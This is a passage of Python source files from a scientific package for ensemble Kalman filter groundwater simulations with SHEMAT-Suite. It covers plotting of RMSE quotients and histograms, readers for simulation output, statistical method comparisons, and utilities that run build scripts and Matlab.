ax.set_xlim([xlim_min, (num_legs*(num_pack+1) if xlim_max is None
else xlim_max)])
ax.set_ylabel(ylabel,
fontsize=fontlab,
labelpad=10)
ax.tick_params(direction='in', length=6,
width=1, labelsize=fonttic,
top=False, right=False, bottom=False,
pad=8)
ax.set_xticks([])
ax.set_yticks(yticks)
ax.get_xaxis().set_visible(False)
ax.set_ylim(ylims)
# Saving location
pic_name = pm.py_output_filename(
ea.tag,
which_res,
stat_method+'_'+model+'_'
+ '_'.join([str(enssize) for enssize in ensemble_sizes])+'_'
+ '_'.join([str(i) for i in which_methods]),
pic_format
)
return ax, pic_name
###############################################################################
# Matrix plot of RMSE quotients #
###############################################################################
def quots(
ax,
which_methods=[0, 1, 2, 3, 4, 5, 6],
which_res='endres',
stat_method='mean',
model='wavebc',
ensemble_sizes=[50, 70, 100, 250],
ensemble_size=50,
pic_format='pdf',
is_text=False,
axistitle='',
fonttit=40,
figpos=[0.32, 0.2, 0.6, 0.8],
ticksize=20,
):
"""
A function plotting a grid of quotients of
statistical measures.
Parameters
----------
ax : Axes
The axes to draw to.
which_methods : array int
Array of integers containing the method specifiers
from module plotarrays.
The methods appear in the plot in this order.
which_res : string
'endres' - use residuals after EnKF run
'begres' - use residuals before EnKF run
stat_method : string
'mean' - Means
'std' - Standard deviation
'stdm' - Standard deviation of the mean
'median' - Median or 50 Percentile
'q25' - 25 Percentile
'q75' - 75 Percentile
model : string
'wavebc' - Model wavebc
'wave' - Model wave
ensemble_sizes : array of integers
array can typically contain 50, 70, 100, 250,
500, 1000, 2000
ensemble_size : integer
Ensemble size of the job. Possibilities: 50,
70, 100, 250, 500, 1000, 2000
pic_format : string
Format of the picture
'pdf' - pdf-format
'eps' - eps-format
'png' - png-format
'jpg' - jpg-format
'svg' - svg-format
figpos : array of floats
Four numbers
xbeg, ybeg, xrange, yrange
More input specifying plot parameters.
Returns
-------
ax : Axes
Axes containing quotient matrix.
pic_name : string
Containing proposed saving location for Figure.
"""
# Check
if ensemble_size not in [50, 70, 100, 250, 500, 1000, 2000]:
raise RuntimeError('ensemble_size wrong')
# Title
ax.set_title(axistitle, size=fonttit)
# Number of compared methods
num_methods = len(which_methods)
# Ensemble size translated to index
iens = pa.indens[model][ensemble_size]
# Load residuals
res = np.load(pm.py_output_filename(
'errorplot',
which_res,
stat_method+'_'+model+'_'
+ '_'.join([str(enssize) for enssize in ensemble_sizes])+'_'
+ '_'.join([str(i) for i in which_methods]),
'npy'))
# Calculate and sort quots
quots = np.array(
[[res[i1, iens]/res[i2, iens] for i1 in range(num_methods)]
for i2 in range(num_methods)]
)
ax.set_position(figpos)
# White Rectangles
for ipm in range(num_methods):
for jpm in range(num_methods):
# Diagonal black
if ipm == jpm:
quots[ipm, jpm] = 0.0
# Upper triangle white
if ipm < jpm:
quots[ipm, jpm] = None
ax.imshow(
quots,
interpolation='nearest',
cmap='Greys_r',
norm=colors.Normalize(vmin=0.8, vmax=1.0, clip=False)
)
# Plot: Mostly ticks
ax.set_xticks([i for i in range(num_methods)])
ax.set_xticklabels([pa.names_methods[which_methods[i]]
for i in range(len(which_methods))],
fontsize=ticksize,
rotation=90)
ax.set_yticks([i for i in range(num_methods)])
ax.set_yticklabels([pa.names_methods[which_methods[i]]
for i in range(len(which_methods))],
fontsize=ticksize)
ax.tick_params(length=0)
ax.set_frame_on(False)
# Text
for itext in range(num_methods):
for jtext in range(num_methods):
if itext < jtext:
ntext = quots[jtext, itext]
ttext = str(ntext)[0:4]
px = itext-0.35
py = jtext+0.15
colero = 'white' if ntext < 0.9 else 'black'
ax.text(px, py, ttext, color=colero, fontsize=25)
# Text: n_syn and ensemble_size
if is_text:
model_spec = ' Tracer ' if model == 'wavereal' else ' Well '
ax.text(
3.5, 1.5,
model_spec+'\n'
+ r' $n_{e}$: '+str(ensemble_size).rjust(4),
linespacing=1.5,
fontsize=30,
bbox={'facecolor': 'grey', 'alpha': 0.5, 'pad': 10},
)
# Saving location
pic_name = pm.py_output_filename(
ea.tag,
'quots_'+which_res,
stat_method+'_'+model+'_'
+ str(ensemble_size)+'_'
+ '_'.join([str(i) for i in which_methods]),
pic_format)
return ax, pic_name
```
#### File: scripts/forward/read.py
```python
from pskf.tools.plot import specs as sc
from pskf.tools.plot import plotfunctions as pf
from pskf.tools.run import runmodule as rm
from pskf.tools.run import pythonmodule as pm
from pskf.scripts.forward import arrays as fa
def read(
model_name,
dat,
let,
fdir=None,
fname=None,
varname='uindex',
nt=0,
):
"""
Reading variable array from SHEMAT-Suite vtk-file.
Parameters
----------
model_name : string
String of model name.
dat : string
String with date of model run.
let : string
String of letter of model run.
varname : string
Variable name for array to be read.
Possibilities: 'uindex' 'head','temp','kz', 'v'
nt : string
Number of time step output.
Returns
-------
numpy_array : array
Array containing the variable array
numpy_array_name : string
Containing proposed saving location for Array.
"""
# Dirs
if fdir is None:
# samples_output_dir
fdir = rm.make_output_dirs(model_name, dat, let)[1]
if fname is None:
# time_out_file
fname = rm.make_file_dir_names(model_name, nt)[17]
# Get filetype ############################################################
if fname[-3:] == 'vtk':
ftype = 'vtk'
elif fname[-2:] == 'h5' or fname[-3:] == 'hdf':
ftype = 'hdf'
else:
print(fname)
raise RuntimeError('Wrong filetype.')
# Get reader ##############################################################
if ftype == 'vtk':
reader = pf.my_vtk(fdir, fname, varname)
elif ftype == 'hdf':
reader = pf.my_hdf(fdir+'/'+fname, varname)
# Numpy Array ############################################################
if ftype == 'vtk':
numpy_array = pf.my_vtk_to_numpy(reader)
elif ftype == 'hdf':
numpy_array = reader
# Numpy Array Name ########################################################
numpy_array_name = pm.py_output_filename(
fa.tag,
varname,
sc.specl(model_name, dat, let)+'_'+str(nt),
"npy",
)
return numpy_array, numpy_array_name
```
#### File: scripts/gaussianity/plot.py
```python
from matplotlib import mlab
import numpy as np
from pskf.tools.run import pythonmodule as pm
from pskf.scripts.gaussianity import arrays as ga
def hist(
ax,
model_name='wavebc',
which_method=0,
ensemble_size=50,
n_syn=10,
n_comparisons=1000,
which_res='endres',
n_bins=100,
# std_method='std',
pic_format='pdf',
# figpos=[0.15,0.3,0.8,0.6], #xbeg, ybeg, xrange, yrange
xlims=None,
histlims=None,
title=None,
titley=1.05,
is_plot=False,
xlabel=None,
ylabel=None,
# ylims=[0.28,0.82],
is_xticks=True,
is_yticks=True,
itickhide=10,
# num_pack=4, # Number of methods in pack
# formatsos=['o','v','s','p','o','v','s','p'],
# coleros=[(0.0,0.0,0.0),(0.0,0.0,0.0),(0.0,0.0,0.0),(0.0,0.0,0.0),
# (1.0,1.0,1.0),(1.0,1.0,1.0),(1.0,1.0,1.0),(1.0,1.0,1.0)],
# markersize=10,
# markeredgesize=1.5,
# fontleg=30, #18
fonttit=30,
fontaxl=30,
fonttic=10,
):
"""
A histogramming function for means of random subsets
of given size.
Parameters
----------
ax : Axes
The axes to draw to.
model_name : string
String of model name.
'wavebc' - Model wavebc
'wavereal' - Model wavereal
'wavewell' - Model wavewell
'wave' - Model wave
which_method : int
Integer containing the method specifier
from module plotarrays.
ensemble_size : integer
Ensemble size of the job. Possibilities: 50,
70, 100, 250, 500, 1000, 2000
n_syn : integer
Number of synthetic studies in subset for mean calculation.
n_comparisons : integer
Number of means calculated.
which_res : string
'endres' - use residuals after EnKF run
'begres' - use residuals before EnKF run
n_bins : integer
Number of bins of histogram
pic_format : string
Format of the picture
'pdf' - pdf-format
'eps' - eps-format
'png' - png-format
'jpg' - jpg-format
'svg' - svg-format
Returns
-------
ax : Axes
Axes containing histogram.
pic_name : string
Containing proposed saving location for Figure.
"""
# Load means
arr = np.load(pm.py_output_filename(
ga.tag,
'meanarray_'+which_res,
model_name+'_'+str(ensemble_size)+'_'+str(n_syn)
+ '_'+str(n_comparisons)+'_'+str(which_method),
'npy'))
# Histogram
n, bins, patches = ax.hist(
arr,
n_bins,
color='grey',
range=histlims,
density=True,
stacked=True
)
ax.tick_params(labelsize=fonttic)
if xlims:
ax.set_xlim(xlims)
if title:
ax.set_title(title, size=fonttit, y=titley)
if not is_xticks:
ax.set_xticklabels([])
else:
for label in ax.xaxis.get_ticklabels()[::itickhide]:
label.set_visible(False)
if not is_yticks:
ax.set_yticklabels([])
else:
for label in ax.yaxis.get_ticklabels()[::itickhide]:
label.set_visible(False)
if xlabel:
ax.set_xlabel(xlabel, size=fontaxl)
if ylabel:
ax.set_ylabel(ylabel, size=fontaxl)
if is_plot:
# add a 'best fit' line
y = mlab.normpdf(bins, np.mean(arr), np.std(arr))
ax.plot(bins, y, '--', lw=1, color="k")
# Saving location
pic_name = pm.py_output_filename(
ga.tag,
'meanarray_'+which_res,
model_name+'_'+str(ensemble_size)+'_'+str(n_syn)
+ '_'+str(n_comparisons)+'_'+str(which_method),
pic_format
)
return ax, pic_name
```
#### File: scripts/monitor/read.py
```python
import os
import numpy as np
from pskf.tools.plot import specs as sc
from pskf.tools.run import runmodule as rm
from pskf.tools.run import pythonmodule as pm
from pskf.scripts.monitor import arrays as ma
def read(
model_name,
dat,
let,
fdir=None,
fname=None,
varname='uindex',
num_mon=1,
):
"""
Reading monitor arrays from SHEMAT-Suite.
Parameters
----------
model_name : string
String of model name.
dat : string
String with date of model run.
let : string
String of letter of model run.
varname : string
Variable name for array to be read.
Possibilities: 'uindex' 'head','temp','kz', 'v'
num_mon : integer
Number for monitoring point.
IMPORTANT: num_mon = 0 corresponds to the first
monitoring point in SHEMAT monitor file.
General: num_mon = i corresponds to monitoring
point i+1
Returns
-------
numpy_array : array
Array containing the monitor variable array
numpy_array_name : string
Containing proposed saving location for Array.
"""
# Dirs
if fdir is None:
# samples_output_dir
fdir = rm.make_output_dirs(model_name, dat, let)[1]
if fname is None:
# monitor_file
fname = rm.make_file_dir_names(model_name)[16]
# Read from monitor file ##################################################
numpy_array = np.genfromtxt(fdir+'/'+fname,
dtype='f8',
comments='%',
usecols=(ma.varpos[varname]),
)
# Reshape #################################################################
num_mons = sc.num_mons(model_name, dat, let)
if np.remainder(len(numpy_array), num_mons):
raise RuntimeError('Problem with num_mons')
numpy_array = numpy_array.reshape(len(numpy_array)/num_mons, num_mons)
numpy_array = numpy_array[:, num_mon]
# Numpy Array Name ########################################################
numpy_array_name = pm.py_output_filename(
ma.tag,
varname,
sc.specl(model_name, dat, let)+'_'+str(num_mon),
"npy"
)
return numpy_array, numpy_array_name
def read_all(
fdir,
fname,
infdir,
infname,
varname='uindex',
num_mon=1,
):
"""
Reading general monitor files from SHEMAT-Suite.
Parameters
----------
fdir : string
String of directory of monitor file
fname : string
String of name of monitor file
infdir : string
String of directory of SHEMAT-Suite input file
infname : string
String of name of SHEMAT-Suite input file
varname : string
Variable name for array to be read.
Possibilities: 'uindex' 'head','temp','kz', 'v'
num_mon : integer
Number for monitoring point.
IMPORTANT: num_mon = 0 corresponds to the first
monitoring point in SHEMAT monitor file.
General: num_mon = i corresponds to monitoring
point i+1
Returns
-------
numpy_array : array
Array containing the monitor variable array
"""
# Read from monitor file ##################################################
numpy_array = np.genfromtxt(fdir+'/'+fname,
dtype='f8',
comments='%',
usecols=(ma.varpos[varname]),
)
# Reshape #################################################################
num_mons = sc.num_mons_all(infdir, infname)
if np.remainder(len(numpy_array), num_mons):
raise RuntimeError('Problem with num_mons')
numpy_array = numpy_array.reshape(int(len(numpy_array)/num_mons), num_mons)
numpy_array = numpy_array[:, num_mon]
return numpy_array
def mean(
model_name,
dat,
let,
varname='uindex',
mons=[0, 1],
):
"""
Computing mean monitor arrays from certain monitoring points.
Parameters
----------
model_name : string
String of model name.
dat : string
String with date of model run.
let : string
String of letter of model run.
varname : string
Variable name for array to be read.
Possibilities: 'uindex' 'head','temp','kz', 'v'
mons : array of integers
Numbers for monitoring points for mean.
IMPORTANT: num_mon = 0 corresponds to the first
monitoring point in SHEMAT monitor file.
General: num_mon = i corresponds to monitoring
point i+1
Returns
-------
mean_array : array
Array containing the mean monitor variable array
mean_array_name : string
Containing proposed saving location for Array.
"""
for imon, num_mon in enumerate(mons):
# File name
filename = pm.py_output_filename(
ma.tag,
varname,
sc.specl(model_name, dat, let)+'_'+str(num_mon),
"npy")
# Check existence
if not os.path.isfile(filename):
raise RuntimeError(
'Monitoring numpy-file does not exist: '
+ filename)
# Load filename
if imon == 0:
mean_array = np.load(filename)
else:
mean_array = mean_array + np.load(filename)
if imon == len(mons)-1:
mean_array = mean_array/np.float(len(mons))
# Mean array name
mean_array_name = pm.py_output_filename(
ma.tag,
varname,
sc.specl(model_name, dat, let)+'_'
+ 'mean'+'_'
+ '_'.join([str(i) for i in mons]),
"npy"
)
return mean_array, mean_array_name
```
#### File: scripts/numcomp/read.py
```python
import numpy as np
import scipy as sp
from scipy import stats
from pskf.tools.plot import plotarrays as pa
from pskf.tools.run import pythonmodule as pm
from pskf.scripts.numcomp import arrays as na
def read(
which_methods,
which_res='endres',
model='wavebc',
ensemble_sizes=[50, 70, 100, 250],
method='ttest',
ensemble_size=50,
n_syn=1,
n_comparisons=10000,
cl=0.95,
pval=0.05,
):
"""
Reads residual arrays at beginning (begres) or
end (endres) of the EnKF run and calculates
probability arrays which method is better,
worse, or if they are even.
Parameters
----------
which_methods : array int
Array of integers containing the method specifiers
from module plotarrays.
which_res : string
'endres' - use residuals after EnKF run
'begres' - use residuals before EnKF run
model : string
'wavebc' - Model wavebc
'wave' - Model wave
ensemble_sizes : array of integers
array can typically contain 50, 70, 100, 250,
500, 1000, 2000
method : string
Which method to use for statistical comparison
of the subset. If n_syn == 1, the comparison
always defaults to comparing the residuals.
'ttest' - Use the T-Test, testing if the
two samples belong to the same
Gaussian distribution.
'gauss' - Calculate Gaussian distribution
of the difference and calculate
its probability to be larger
than zero.
'meanc' - Calculate the means and compare.
ensemble_size : integer
Ensemble size of the job. Possibilities: 50,
70, 100, 250, 500, 1000, 2000
n_syn : integer
Number of synthetic studies in subset.
n_comparisons : integer
Number of comparisons calculated.
cl : float
Confidence level for 'gauss'. If the probability
weight of the distribution of the difference between
two methods is larger than cl on one side of zero,
then the method with the smaller RMSE is considered
to have performed better.
pval : float
If the p-value from the T-Test is smaller than pval
the Test is considered to be negative, thus a
significant difference between the distributions is
assumed, making the method with the smaller RMSE
performing significantly better.
Returns
-------
probs : array
Array containing the probabilities.
probs_name : string
Containing proposed saving location for array.
"""
# Checks
if model not in ['wavebc', 'wave', 'wavewell', 'wavereal']:
raise RuntimeError('model wrong')
if method not in ['ttest', 'gauss', 'meanc']:
raise RuntimeError('method wrong')
if ensemble_size in [50, 70, 100, 250]:
if n_syn > 1000:
raise RuntimeError('n_syn wrong')
elif ensemble_size in [500, 1000, 2000]:
if n_syn > 100:
raise RuntimeError('n_syn wrong')
else:
raise RuntimeError('ensemble size wrong')
# Maximum Number of runs
max_n_runs = 0
for i_method in which_methods:
max_n_runs = np.max([pa.nums[model][i_method][ensemble_size],
max_n_runs])
# Load final residuals
res = np.zeros([len(which_methods), max_n_runs])
for i, i_method in enumerate(which_methods):
res_name = pm.py_output_filename(
'dists',
which_res,
model+'_'+pa.dats[model][i_method][ensemble_size]
+ '_'+pa.lets[model][i_method][ensemble_size],
'npy')
res[i, 0:pa.nums[model][i_method][ensemble_size]] = np.load(res_name)
# Initialize probs array
probs = np.zeros([len(which_methods), len(which_methods), 3])
# DOCUMENTATION:
# -------------------------------------------------
# probs[i, j, 0] : Probability that method i is better
# probs[i, j, 1] : Probability that methods are equal
# probs[i, j, 2] : Probability that method j is better
for ii, ri in enumerate(which_methods):
for ij, rj in enumerate(which_methods):
# Every pair only once (symmetry)
if ij < ij:
continue
# Residual arrays for each method
resi = res[ii, 0:pa.nums[model][ri][ensemble_size]]
resj = res[ij, 0:pa.nums[model][rj][ensemble_size]]
if [n_syn, n_syn] >= [pa.nums[model][ri][ensemble_size],
pa.nums[model][rj][ensemble_size]]:
if not n_comparisons == 1:
raise RuntimeError(
'Set n_comparisons to 1 if n_syn equal'
+ ' to full number of available studies')
ni = 0 # ...i better
ne = 0 # ...equal
nj = 0 # ...j better
# Iterate number of comparisons
for i in range(n_comparisons):
# Subset of random order
isi = np.random.permutation(
np.arange(pa.nums[model][ri][ensemble_size])
)[0:n_syn]
isj = np.random.permutation(
np.arange(pa.nums[model][rj][ensemble_size])
)[0:n_syn]
resmixi = resi[isi]
resmixj = resj[isj]
# Single run
if n_syn == 1:
if resmixi[0] < resmixj[0]:
ni = ni + 1
elif resmixi[0] > resmixj[0]:
nj = nj + 1
else: # Equality happens
ne = ne + 1
# Mean comparison
elif method == "meanc":
if np.mean(resmixi) < np.mean(resmixj):
ni = ni + 1
elif np.mean(resmixi) > np.mean(resmixj):
nj = nj + 1
else: # Equality happens
ne = ne + 1
# T-Test
elif method == "ttest":
tv, pv = stats.ttest_ind(resmixi,
resmixj,
equal_var=False)
if pv < pval: # Significant difference
if tv < 0:
ni = ni+1
else:
nj = nj+1
else: # No significant difference
ne = ne+1
# Gaussian difference
elif method == "gauss":
# Means
mi = np.mean(resmixi)
mj = np.mean(resmixj)
# Mean Standard deviations
si = np.std(resmixi)/np.sqrt(resmixi.size)
sj = np.std(resmixj)/np.sqrt(resmixj.size)
# Mean difference and stdev of mean difference
m = mj-mi
s = np.sqrt(si*si + sj*sj)
# Probability bigger than zero
pcl = 0.5 + 0.5*sp.special.erf(m/(s*np.sqrt(2)))
if pcl > cl: # i better
ni = ni + 1
elif pcl < 1-cl: # j better
nj = nj + 1
else: # No significant difference
ne = ne+1
# Output probabilities
pi = float(ni)/float(ni+ne+nj) # i better
pe = float(ne)/float(ni+ne+nj) # equal
pj = float(nj)/float(ni+ne+nj) # j better
probs[ii, ij, 0] = pi
probs[ii, ij, 1] = pe
probs[ii, ij, 2] = pj
probs[ij, ii, 0] = pj
probs[ij, ii, 1] = pe
probs[ij, ii, 2] = pi
probs_name = pm.py_output_filename(
na.tag,
'probs_'+which_res,
model+'_'+method+'_'+str(ensemble_size)+'_'
+ str(n_syn)+'_'+str(n_comparisons)+'_'
+ '_'.join([str(i) for i in which_methods]),
'npy')
return probs, probs_name
```
#### File: tools/run/runmodule.py
```python
import subprocess
import os
import shlex
import string
import shutil
import numpy as np
import pskf.tools.run.pythonmodule as pm
#############################################################
# REPLACE STRING
#############################################################
def replace_string(file_name_input, old_str, new_str):
"In file_name_input every instance of old_str is replaced by new_str"
ostr_not_exist = 1
file_name_tmp = 'filename.tmp'
file_input = open(file_name_input, 'r')
file_tmp = open(file_name_tmp, 'w')
for line in file_input:
ostr_exist_check = line.find(old_str)
if (ostr_exist_check > -1):
ostr_not_exist = 0
file_tmp.write(line.replace(old_str, new_str))
file_input.close()
file_tmp.close()
os.remove(file_name_input)
os.rename(file_name_tmp, file_name_input)
if ostr_not_exist:
raise RuntimeError('String to be replaced: ' + old_str +
' not found in ' + file_name_input)
return
#############################################################
# MAKE TEMP COPY OF INPUTFILE
#############################################################
def make_tmp(file_name_input):
"Make a tmp file by adding .tmp at the end of the filename (input)."
file_input = open(file_name_input, 'r')
file_tmp = open(file_name_input + '.tmp', 'w')
for line in file_input:
file_tmp.write(line)
file_input.close()
file_tmp.close()
#############################################################
# RETURN THE INPUTFILE TO THE STATE OF THE TEMP COPY
#############################################################
def get_tmp(file_name_input):
"Copy the tmp file to the real one and then remove the tmp file."
file_input = open(file_name_input, 'w')
file_tmp = open(file_name_input + '.tmp', 'r')
for line in file_tmp:
file_input.write(line)
file_input.close()
file_tmp.close()
os.remove(file_name_input + '.tmp')
#############################################################
# GET INTEGER CORRESPONDING TO ALPHABET LETTER
#############################################################
def get_num_let(let):
"""
Returns the integer corresponding to the input letter
"""
alphabet = string.ascii_lowercase
if len(let) == 1:
return alphabet.index(let)
if len(let) == 2:
return 26 * (alphabet.index(let[0])) + alphabet.index(let[1]) + 26
if len(let) == 3:
return (26 * 26 * (alphabet.index(let[0])) + 26 *
(alphabet.index(let[1])) + alphabet.index(let[2]) + 26 * 26 +
26)
else:
raise RuntimeError('letter does not contain' + ' 1,2 or 3 letters')
#############################################################
# GET ALPHABET LETTER CORRESPONDING TO INTEGER
#############################################################
def get_let_num(num):
"""
Returns the letter of the alphabet corresponding to the input integer.
The form of the number is (ii are the indices of the letters in
string.ascii_lowercase, 0<= ii <=25):
Length1: i0
Length2: 26*i0 + i1 + 26
Length3: 26^2*i0 + 26*i1 + i2 + 26^2 + 26
"""
alphabet = string.ascii_lowercase
if num < 26:
return alphabet[num]
elif num < 702:
num = num - 26
return alphabet[num // 26] + get_let_num(num % 26)
elif num < 18278:
num = num - 26 * 26 - 26
return alphabet[num // 676] + get_let_num((num % 676) + 26)
else:
raise RuntimeError('Number too high: Should be < 18278')
#############################################################
# Run a script
#############################################################
def run_script(path, name, outfile=None, instr=None, wait=None, errout=None):
"""
Runs Scripts with optional output, input, waiting for it to end
and Error if execution went wrong.
"""
proc = subprocess.run(name, cwd=path, stdout=outfile, input=instr)
if errout:
proc.check_returncode()
# os.chdir(path)
# if not outfile:
# proc = subprocess.Popen(name, stdin=subprocess.PIPE)
# else:
# proc = subprocess.Popen(name, stdin=subprocess.PIPE, stdout=outfile)
# if instr:
# subprocess.Popen.communicate(proc, input=instr)
# if wait:
# subprocess.Popen.wait(proc)
# if errout:
# if (proc.returncode):
# os.chdir(pm.python_dir)
# raise RuntimeError("Problems in " + str(name) + "\n" +
# "Returncode: " + str(proc.returncode))
#############################################################
# CHECK FILE FOR HASHTAG INPUT
#############################################################
def check_hashtag(path, fname, hashtag_line):
"""
Check if file exists and if hashtag_line is in file.
Parameters
----------
path : string
Path to the file. Without '/' at end.
fname : string
Name of the file.
hashtag_line : string
String to search the file for.
Returns
-------
is_hashtag : boolean
False: Hashtag line not in file or file not found.
True: File found and hashtag line found in file.
"""
# Check existence of file.
try:
f = open(path + '/' + fname, 'r')
except IOError:
is_hashtag = False
return is_hashtag
# Check existence of hashtag_line
is_hashtag = False
for line in f:
if line.find(hashtag_line) > -1:
is_hashtag = True
return is_hashtag
#############################################################
# CHANGE HASHTAG INPUT
#############################################################
def change_hashtag_input(file_name, hashtag_line, new_input,
delete_lines=None):
"In file_name hashtag_line is found and new_input inserted as next line"
hashstr_not_exist = 1
file_name_tmp = 'filename.tmp'
file_input = open(file_name, 'r')
file_tmp = open(file_name_tmp, 'w')
for line in file_input:
hashstr_exist_check = line.find(hashtag_line)
if (hashstr_exist_check > -1):
hashstr_not_exist = hashstr_not_exist - 1
file_tmp.write(line)
file_tmp.write(new_input)
file_tmp.write("\n\n\n")
if delete_lines:
for i in range(delete_lines):
next(file_input)
else:
file_tmp.write(line)
file_input.close()
file_tmp.close()
os.remove(file_name)
os.rename(file_name_tmp, file_name)
if hashstr_not_exist:
raise RuntimeError('Hashtag-catchphrase not found.' +
'\n\nThe catchphrase ' + hashtag_line +
' was found ' + str(1 - hashstr_not_exist) +
' times in ' + file_name)
return
#############################################################
# READ HASHTAG INPUT
#############################################################
def read_hashtag_input(file_name, hashtag_line, nl):
"""
Read a number of lines of a hashtag input
"""
hashstr_not_exist = 1
file_input = open(file_name, 'r')
numl = 1
for line in file_input:
hashstr_exist_check = line.find(hashtag_line)
if (hashstr_exist_check > -1):
hashl = numl
hashstr_not_exist = hashstr_not_exist - 1
numl = numl + 1
file_input.close()
if hashstr_not_exist:
raise RuntimeError('Hashtag-catchphrase not found.' +
'\n\nThe catchphrase ' + hashtag_line +
' was found ' + str(1 - hashstr_not_exist) +
' times in' + file_name)
str_out = ""
file_input = open(file_name, 'r')
for i in range(hashl):
file_input.readline()
for i in range(nl):
str_out += file_input.readline()
file_input.close()
return str_out
#############################################################
# READ RECORDS INPUT
#############################################################
def read_records_input(file_name, hashtag_line):
"""
Read number of records of a hashtag input
"""
hashstr_not_exist = 1
file_input = open(file_name, 'r')
numl = 1
for line in file_input:
hashstr_exist_check = line.find(hashtag_line)
# print(hashstr_exist_check)
if (hashstr_exist_check > -1):
hashl = numl
hashstr_not_exist = hashstr_not_exist - 1
numl = numl + 1
file_input.close()
if hashstr_not_exist:
raise RuntimeError('Hashtag-catchphrase not found.' +
'\n\nThe catchphrase ' + hashtag_line +
' was found ' + str(1 - hashstr_not_exist) +
' times in' + file_name)
str_out = ""
file_input = open(file_name, 'r')
for i in range(hashl - 1):
file_input.readline()
str_out += file_input.readline()
file_input.close()
records_not_exist_check = 1
for s_out in str.split(str_out):
if s_out[:7] == 'records':
records_not_exist_check = 0
for i in range(len(s_out)):
if s_out[i - 1] == '=':
num_records = int(s_out[i:])
if records_not_exist_check == 1:
raise RuntimeError('No records in Hashtag-Input: ' + hashtag_line)
return num_records
#############################################################
# COMPILEQUICK
#############################################################
def compilequick(model_dir, vtk_var=1, omp_var=1, fw_var=0):
"""
This function is a wrapper organizing different inputs
given to py_compilequick.sh, which is called via
the function rm.run_script.
"""
# Forward or Simulate
if fw_var:
shem_type = "fw"
shem_type_name = "fw"
else:
shem_type = "sm"
shem_type_name = "sm_sgsim"
# Flags
flags = "nohdf -j16"
flags_name = ""
if vtk_var:
flags += " vtk noplt"
flags_name += "vtk"
else:
flags += " novtk plt"
flags_name += "plt"
if omp_var:
flags += " omp"
flags_name += "_omp"
else:
flags += " noomp"
flags_name += ""
compilequick_input = (shem_type + "\n" + shem_type_name + "\n" + flags +
"\n" + flags_name + "\n")
# run_script
compilation_outfile = open('compilation_' + flags_name + '.out', "w")
run_script(model_dir,
'py_compilequick.sh',
outfile=compilation_outfile,
instr=compilequick_input,
wait=True,
errout=True)
compilation_outfile.close()
return
#############################################################
# MATLAB CALL
#############################################################
def matlab_call(mfile_name, matlab_dir):
"This function invokes Matlab to execute mfile_name"
# Should be called in Matlab_Directory!
os.chdir(matlab_dir)
if os.path.isfile(mfile_name):
args = shlex.split('matlab -nodisplay -nojvm < ' + mfile_name)
process_matlab = subprocess.Popen(args)
subprocess.Popen.wait(process_matlab)
if process_matlab.returncode:
raise RuntimeError("Problems in Matlab Execution of " +
mfile_name)
else:
print("\n\n")
else:
print('\n\nThe Matlab .m-file')
print(mfile_name)
print('did not exist in')
print(os.getcwd())
raise RuntimeError("Matlab file not found.")
return
#############################################################
# CHANGE MATLAB
#############################################################
def change_matlab(mfile_name, output_path, filename, use_dists, means,
standard_deviations, sgsim_switch):
"This function changes the Matlab file"
# Should be called in Matlab_Directory!
if os.path.isfile(mfile_name):
mfile_name_tmp = 'mfilename.tmp'
mfile_input = open(mfile_name, 'r')
mfile_tmp = open(mfile_name_tmp, 'w')
for line in mfile_input:
output_path_exist_check = line.find("output_path = '")
filename_exist_check = line.find("filename = '")
use_dists_exist_check = line.find("use_dists = [")
means_exist_check = line.find("means = [")
stddev_exist_check = line.find("standard_deviations = [")
sgsim_switch_exist_check = line.find("sgsim_switch = ")
# print(output_path_exist_check)
if (output_path_exist_check == 0):
# print('Here')
mfile_tmp.write("output_path = '" + output_path + "';\n")
elif (filename_exist_check == 0):
mfile_tmp.write("filename = '" + filename + "';\n")
elif (use_dists_exist_check == 0):
mfile_tmp.write("use_dists = " + use_dists + ";\n")
elif (means_exist_check == 0):
mfile_tmp.write("means = " + means + ";\n")
elif (stddev_exist_check == 0):
mfile_tmp.write("standard_deviations = " +
standard_deviations + ";\n")
elif (sgsim_switch_exist_check == 0):
mfile_tmp.write("sgsim_switch = " + sgsim_switch + ";\n")
else:
mfile_tmp.write(line)
mfile_input.close()
mfile_tmp.close()
os.remove(mfile_name)
os.rename(mfile_name_tmp, mfile_name)
else:
print('\n\nThe Matlab .m-file')
print(mfile_name)
print('did not exist in')
print(os.getcwd())
return
#############################################################
# CHANGE MATLAB
#############################################################
def simulate_dist(model_name,
dist,
is_true=False,
third_row='log permeability,'):
"""
Writing distributions to log-file for SHEMAT-Suite.
Parameters
----------
model_name : string
String of model name.
'wavebc' - Model wavebc
'wavereal' - Model wavereal
'wavewell' - Model wavewell
'wave' - Model wave
dist : array of floats
Samples of distribution that are to be written
to the file.
Notes
-------
The function writes the logk_model.dat or logk_model_true.dat
files in the SHEMAT-Suite model directory using the numpy
savetxt function.
"""
# log_file name
log_file_name = (make_file_dir_names(model_name)[1] + '/' +
make_file_dir_names(model_name)[8]
if not is_true else make_file_dir_names(model_name)[1] +
'/' + make_file_dir_names(model_name)[7])
# Save to text file
np.savetxt(
log_file_name,
dist,
comments='',
header=('Target Histogram\n' + '1\n' + third_row + ' ' +
str(np.mean(dist)) + ' +- ' + str(np.std(dist)) + ', [' +
str(np.min(dist)) + ',' + str(np.max(dist)) + ']'))
###############################################################################
# DOES OUTPUT EXIST #
###############################################################################
def is_output_dir(model_name, dat, let, check_resid=False):
"""
Check if there is an output directory for model_name, dat, let.
If check_resid is given, check for the residual file.
"""
if os.path.isdir(make_output_dirs(model_name, dat, let)[0]):
if check_resid:
if os.path.isfile(
make_output_dirs(model_name, dat, let)[2] + "/" +
"residual_E1.vtk"):
return True
else:
return False
else:
return True
else:
return False
###############################################################################
# MAKE OUTPUT DIRECTORY #
###############################################################################
def make_output_dirs(model_name, dat, let):
"""
Generate output directories of the run corresponding to
- model_name
- dat
- let
0 - output_dir
1 - samples_output_dir
2 - enkf_output_dir
"""
output_dir = (os.environ['HOME'] + "/shematOutputDir/" + model_name +
"_output/" + dat + "/" + dat + "_" + let)
samples_output_dir = (os.environ['HOME'] + "/shematOutputDir/" +
model_name + "_output/" + dat + "/" + dat + "_" +
let + "/samples_output")
enkf_output_dir = (os.environ['HOME'] + "/shematOutputDir/" + model_name +
"_output/" + dat + "/" + dat + "_" + let +
"/enkf_output")
return output_dir, \
samples_output_dir, \
enkf_output_dir
###############################################################################
# CHANGE OUTPUT DIRECTORY #
###############################################################################
def change_output_dir(model_name, old_dat, new_dat):
"""
Change the name of an output directory.
Parameters
----------
model_name : string
String of model name.
old_dat : string
String with current output date of model run (to be replaced).
new_dat : string
String with future output date of model run.
"""
